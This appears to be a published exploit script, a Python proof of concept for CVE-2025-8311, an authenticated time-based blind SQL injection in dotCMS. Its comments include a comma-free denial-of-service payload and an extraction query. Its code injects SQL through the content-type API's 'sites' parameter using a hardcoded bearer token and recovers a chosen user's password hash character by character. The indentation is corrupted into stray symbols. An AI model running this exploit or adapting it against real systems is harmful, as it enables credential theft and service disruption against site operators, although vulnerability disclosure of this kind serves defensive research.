dotCMS 25.07.02-1 - Authenticated Blind SQL Injection

#!/usr/bin/env python3

# Exploit Title: dotCMS 25.07.02-1 - Authenticated Blind SQL Injection
# Google Dork: N/A
# Date: 2025-09-09
# Exploit Author: Matan Sandori (OSCP, OSEP, OSWE)
# Vendor Homepage:*https://www.dotcms.com/
# Software Link: https://github.com/dotCMS/core/releases/tag/v25.07.02-1 (tested on: v25.07.02-1)
# Version: Affects 24.03.22 and later (see vendor advisory for fixed versions)
# Tested on: dotCMS v25.07.02-1 (Docker / Linux)
# CVE: CVE-2025-8311


# The application blocks the comma character, so a simple DoS payload like:
# ') AND 1=(SELECT 1 FROM generate_series(1,500000) AS a CROSS JOIN generate_series(1,500000) AS b) AND ('FYHh' LIKE 'FYHh
# will not work.

# Instead, a comma-free payload can be used, for example:
# ') AND 1=(WITH RECURSIVE nums(i) AS (SELECT 1 UNION ALL SELECT i + 1 FROM nums WHERE i < 1000000) SELECT MIN(1) FROM nums AS a CROSS JOIN nums AS b) AND ('A' LIKE 'A

# Example query for time-based extraction of data:
# ') AND 1=(SELECT CASE WHEN (substring(emailaddress from 1 for 1)='a') THEN (SELECT 1 FROM pg_sleep(10) WHERE firstname='Admin') ELSE 1 END FROM user_ WHERE firstname='Admin') AND ('1' LIKE '1

# This PoC demonstrates time-based blind SQLi. Error-based SQLi is also possible and allows faster data extraction.
# Using sqlmap with the --no-cast flag is recommended, as it will not work otherwise.

import sys
import time
import string
import urllib3
import requests

### User configuration
HOST="127.0.0.1:8443";
TARGET_ACCOUNT = "admin@dotcms.com";
SLEEP_TIME=10;
TOKEN="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhcGk0ZjFhNGYyMi1lYzI5LTQ4OTUtYTBlYi1jYjRkYjEzOGQ2MDAiLCJ4bW9kIjoxNzUxOTQzOTEwMDAwLCJuYmYiOjE3NTE5NDM5MTAsImlzcyI6ImRvdGNtc19kZXYiLCJsYWJlbCI6InRva2VuIiwiZXhwIjoxODQ2NjQxNjAxLCJpYXQiOjE3NTE5NDM5MTAsImp0aSI6IjMyNjIxYmRkLTNhYjEtNGRiMi1iNjEyLWMzMDg5M2EyODBiZSJ9.jqXkfM4Itxy_q2kA10srcL_3NBBx6keXx2PM0mESPFI";
CHARS = string.printable;

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning);

def encode_all_characters(string):
�0�2 �0�2 return "".join("%{0:0>2x}".format(ord(char)) for char in string);

def send_request(payload=""):
�0�2 �0�2 payload = encode_all_characters(payload);
�0�2 �0�2 burp0_url = f"https://{HOST}/api/v1/contenttype?filter=LCKwsF&page=774232&per_page=517532&orderby=wDdAmr&direction=DESC&type=DOTASSET&host=BBadoI&sites=PoC{payload}";
�0�2 �0�2 burp0_headers = {"Accept-Encoding": "gzip, deflate, br", "Accept": "*/*", "Accept-Language": "en-US;q=0.9,en;q=0.8", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36", "Connection": "close", "Cache-Control": "max-age=0", "Authorization": f"Bearer {TOKEN}"};
�0�2 �0�2 return requests.get(burp0_url, headers=burp0_headers, verify=False);

def send_sqli(q):
�0�2 �0�2 query = "') AND 1=(" + q + ") AND ('A' LIKE 'A";
�0�2 �0�2 return send_request(query);

def test_sqli():
�0�2 �0�2 print("[!] Checking target responsiveness...")
�0�2 �0�2 r = send_request();

�0�2 �0�2 if '{"entity":[],"errors":[],"i18nMessagesMap":{},"messages":[],"pagination":{"currentPage":' not in r.text:
�0�2 �0�2 �0�2 �0�2 print("[-] Target did NOT return the expected JSON structure. Exiting.");
�0�2 �0�2 �0�2 �0�2 sys.exit(1);
�0�2 �0�2
�0�2 �0�2 print("[+] Target responded correctly.\n");

�0�2 �0�2 r = send_sqli(f"SELECT 1 FROM PG_SLEEP({SLEEP_TIME})");

�0�2 �0�2 if (not r.elapsed.total_seconds() >= SLEEP_TIME):
�0�2 �0�2 �0�2 �0�2 print("[-] Target did not pause as expected; Exiting.");
�0�2 �0�2 �0�2 �0�2 sys.exit(1);


def retrieve_password(TEMPLATE, CHARS):
�0�2 �0�2 CHARS = ":" + CHARS.replace(":", '');
�0�2 �0�2 output = "";
�0�2 �0�2 index = 1;

�0�2 �0�2 while True:
�0�2 �0�2 �0�2 �0�2 for character in CHARS:
�0�2 �0�2 �0�2 �0�2 �0�2 �0�2 query = str(TEMPLATE).replace("[_INDEX_PLACEHOLDER_]", str(index)).replace("[_ASCII_PLACEHOLDER_]", str(ord(character)));
�0�2 �0�2 �0�2 �0�2
�0�2 �0�2 �0�2 �0�2 �0�2 �0�2 r = send_sqli(query);
�0�2 �0�2 �0�2 �0�2
�0�2 �0�2 �0�2 �0�2 �0�2 �0�2 if (r.elapsed.total_seconds() >= SLEEP_TIME):
�0�2 �0�2 �0�2 �0�2 �0�2 �0�2 �0�2 �0�2 print(f"[+] Found character: {character}");
�0�2 �0�2 �0�2 �0�2 �0�2 �0�2 �0�2 �0�2 index += 1;
�0�2 �0�2 �0�2 �0�2 �0�2 �0�2 �0�2 �0�2 output += character;
�0�2 �0�2 �0�2 �0�2 �0�2 �0�2 �0�2 �0�2 break;
�0�2 �0�2 �0�2 �0�2 else:
�0�2 �0�2 �0�2 �0�2 �0�2 �0�2 break;

�0�2 �0�2 return output;

test_sqli();

print("[+] Target is Vulnerable to SQL Injection.\n");

TEMPLATE = f"SELECT (CASE WHEN (substring(password_ from [_INDEX_PLACEHOLDER_] for 1)=chr([_ASCII_PLACEHOLDER_])) THEN (SELECT 1 FROM pg_sleep({SLEEP_TIME / 2}) WHERE emailaddress = '{TARGET_ACCOUNT}') ELSE 1 END) from user_ where emailaddress = '{TARGET_ACCOUNT}'";

password = retrieve_password(TEMPLATE, CHARS);

print(f"[+] Retrieved hash/password for {TARGET_ACCOUNT}: {password}");